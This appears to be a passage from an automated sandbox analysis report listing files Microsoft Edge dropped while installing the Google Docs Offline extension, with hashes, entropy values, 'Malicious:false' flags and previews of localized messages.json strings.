                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):908
                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):977
                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):930
                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):913
                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):806
                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):883
                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):851
                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):851
                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
